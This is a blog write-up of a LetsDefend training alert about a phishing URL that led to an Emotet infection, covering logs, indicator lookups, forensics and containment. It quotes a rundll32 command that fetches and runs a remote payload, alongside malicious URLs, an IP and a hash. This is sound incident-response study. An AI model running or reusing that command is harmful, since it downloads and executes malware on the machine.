Post

SOC Alert Investigation: EventID 86 - Phishing URL Detected [SOC141]

Posted
By El OMARI Zakaria
2 min read
SOC Alert Investigation: EventID 86 - Phishing URL Detected [SOC141]

Platform: LetsDefend
Alert ID: SOC141
Event ID: 86
Alert Name: Phishing URL Detected
Incident Type: Proxy / Phishing / Malware
Event Time: Mar, 22, 2021, 09:23 PM

Incident Details

CategoryDetails
Incident NameEventID: 86 - [SOC141 - Phishing URL Detected]
DescriptionPhishing URL detection triggered by Proxy logs
Incident TypeProxy / Phishing / Malware
Event TimeMar, 22, 2021, 09:23 PM
AnalystSOC Analyst

Investigation Playbook

1. Collection Data & Triage

  • Source Address: 172.16.17.49 (Hostname: EmilyComp)
  • Target User: ellie (Identified via URL parameter ?email=ellie@letsdefend.io)
  • Destination Address: 91.189.114.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) Chrome/79.0.3945.88 Safari/537.36

2. Search Log Analysis

Network Traffic:

FieldValue
TypeProxy
ActionAllowed
Request URLhttp://mogagrocol.ru/wp-content/plugins/akismet/fv/index.php?email=ellie@letsdefend.io
TimeMar, 22, 2021, 09:23 PM

Email Search Note: No corporate email was found for this timestamp. This indicates the user likely accessed the phishing link via Personal Webmail (e.g., Gmail, Yahoo) on the corporate device, bypassing the email gateway.

3. Artifact Analysis

  • URL Analysis (mogagrocol.ru):
    • Verdict: Malicious
    • VirusTotal: 12/97 vendors flagged as Phishing/Malware.
    • HybridAnalysis: Threat Score 100/100.
  • IP Analysis (91.189.114.8):
    • AlienVault OTX: Identified as C2 infrastructure (Tags: Emotet, Honeypot).

4. Endpoint Investigation (EmilyComp)

A forensic review of the endpoint 172.16.17.49 revealed the attack chain:

  1. Browser History: Confirmed the user visited the malicious URL at 09:23 PM.
  2. Malicious Execution: A rundll32.exe command was spawned immediately after the network connection.
    • Command: rundll32.exe javascript:..\mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'
  3. Dropped Payload:
    • File: KBDYAK.exe
    • MD5: a4513379dad5233afa402cc56a8b9222
    • Malware Family: Emotet (Trojan/Banker)

Containment

  • Action: The device EmilyComp was successfully contained (isolated) to prevent lateral movement.
  • MITRE ATT&CK Mapping:
    • T1566.002: Phishing: Spearphishing Link (User clicked link).
    • T1218.011: Signed Binary Proxy Execution: Rundll32 (Used to execute the payload).
    • T1204.001: User Execution: Malicious Link.

Attack Narrative (The Story)

What Really Happened:

At 09:23 PM on March 22, 2021, the user Ellie was active on the host EmilyComp. While browsing (likely checking personal webmail), she clicked a phishing link disguised as a legitimate plugin URL (mogagrocol.ru).

Because the traffic was Allowed by the proxy, her browser reached the malicious server. The website immediately triggered a Drive-by Download attack. Instead of a simple file download, the site executed a malicious script using a legitimate Windows tool, rundll32.exe (Technique T1218.011), to hide its activity from basic antivirus.

This script reached out to a second C2 server (ru-uid...) and downloaded the Emotet Trojan (filename: KBDYAK.exe). The malware successfully landed on the disk. Emotet is a dangerous banking trojan that also acts as a loader for ransomware. The device was isolated immediately upon detection of the malicious process.

Final Verdict: True Positive (Malware Infection via Phishing Link).

Analysis Date: January 15, 2025
Analyst: El OMARI Zakaria

SOC Alerts, Incident Response, Phishing Investigation
letsdefend phishing emotet proxy-logs endpoint-forensics rundll32 c2-infrastructure malware-analysis
This post is licensed under CC BY 4.0 by the author.